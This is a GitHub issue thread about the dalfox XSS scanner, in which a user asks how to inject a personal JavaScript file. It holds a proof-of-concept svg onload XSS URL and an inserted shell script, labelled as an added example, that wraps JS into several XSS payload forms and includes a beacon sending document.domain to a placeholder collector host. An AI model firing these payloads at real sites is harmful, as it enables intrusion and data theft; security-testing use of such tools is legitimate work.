hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License
3.68k stars 411 forks

Testing script injection #466

Open ChillVibesMushroom opened 1 year ago

ChillVibesMushroom commented 1 year ago

Question

Your questions: Is it possible to test my personal JS script for injection using dalfox?

hahwul commented 1 year ago

To achieve your desired action, there are three specific flags that you can try.

If you want to test with a custom payload, you can use the --custom-payload flag. The other flags are related to functions, such as alert. Currently, there is no direct way to modify the function, but you can achieve a similar effect with a simple trick (with --custom-alert-value).

dalfox url https://xss-game.appspot.com/level1/frame \
  --custom-alert-value "1);your_payload;console.log("

# [POC][R][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=%3CsVg%2Fonload%3Dprompt%281%29%3Byour_payload%3Bconsole.log%28%29%3E
# https://xss-game.appspot.com/level1/frame?query=%3CsVg%2Fonload%3Dprompt%281%29%3Byour_payload%3Bconsole.log%28%29%3E

[Screenshot 2023-05-01 1:03:57 PM]

If you're interested, I can write some code and create a new flag that modifies the function (e.g. --custom-func).

ChillVibesMushroom commented 1 year ago

dalfox url https://xss-game.appspot.com/level1/frame \
  --custom-payload /home/scripts/JavaScript.js

Would that input be right?

hahwul commented 1 year ago

@ChillVibesMushroom The use of the flag is correct. However, I think it may differ from the desired behavior depending on what the file means and its purpose.

Could you show me an example of the .js file? I don't understand exactly what kind of action you want. 😭

ChillVibesMushroom commented 1 year ago

hahwul commented 1 year ago

@ChillVibesMushroom I think that would be suitable for the --custom-payload flag.
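
The two mechanics from hahwul's replies above, the --custom-alert-value splice and the --custom-payload file, as an added shell example that is not part of dalfox or of this thread. It assumes a --custom-payload file is read one payload per line, that the alert value is spliced inside the function call exactly as the PoC URL shows (prompt(1);your_payload;console.log()), and it uses a constructed sample script, a temporary directory and a placeholder target URL. One caveat: hahwul notes the verification-side flags are tied to alert-style functions, so a script that never calls alert/confirm/prompt should be expected to show up as reflected ([R]) rather than verified ([V]).

```shell
#!/bin/sh
# Added example for this thread (not dalfox's own code): turn a one-file JS
# script into a dalfox --custom-payload list, and build the --custom-alert-value
# string for the splice trick shown in the PoC above. File paths and the sample
# script below are constructed for the demo.
set -eu

# Collapse a JS file to a single line. A --custom-payload file holds one payload
# per line, so the script has to be single-line. Line comments (// ...) are
# NOT stripped, so keep them out of the source file.
flatten_js() {
  tr -d '\r' < "$1" | tr '\n' ' ' \
    | sed -e 's/[[:space:]]\{1,\}/ /g' -e 's/^ //' -e 's/ $//'
}

# Wrap single-line JS ($1) in one payload per injection context. The attribute
# forms use double quotes, so the JS must use single-quoted strings only.
wrap_payloads() {
  printf '%s\n' \
    "<svg/onload=\"$1\">" \
    "\"><svg/onload=\"$1\">" \
    "'><svg/onload=\"$1\">" \
    "<script>$1</script>" \
    "\"><script>$1</script>" \
    "' onmouseover=\"$1\" x='"
}

# Build the --custom-alert-value that makes dalfox's alert-style payloads run
# $1: the value is spliced between the parentheses of e.g. prompt(...), so
# "1);<js>;console.log(" becomes prompt(1);<js>;console.log().
alert_value_for() {
  printf '%s' "1);$1;console.log("
}

# Demo: a benign beacon that reports document.domain to a hypothetical collector.
work=$(mktemp -d)
cat > "$work/beacon.js" <<'EOF'
var i = new Image();
i.src = 'https://collector.example/?d=' + encodeURIComponent(document.domain);
EOF

js=$(flatten_js "$work/beacon.js")
wrap_payloads "$js" > "$work/payloads.txt"
alert_value_for "$js" > "$work/alert-value.txt"

echo "Payload file:     $work/payloads.txt"
echo "Alert value file: $work/alert-value.txt"
echo "Run either of (target URL is a placeholder):"
echo "  dalfox url 'https://target.example/?q=x' --custom-payload $work/payloads.txt"
echo "  dalfox url 'https://target.example/?q=x' --custom-alert-value \"\$(cat $work/alert-value.txt)\""
```

The alert value is read back from a file in the printed command because the JS contains quotes, and quoting it inline on a shell command line is where most mistakes with this trick happen.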

ChillVibesMushroom commented 1 year ago

I'll give it a shot right now. I'm looking into different frameworks. I just remembered I actually do have to install Dalfox. You know what, I realized, though, that the tool is pretty powerful: it doesn't automatically go into incognito mode, it just gets straight to it, and alongside other tools like hakrawler it's powerful.

I was going to ask you but I never got the chance: what tools would you use alongside dalfox when scanning a website for vulnerabilities?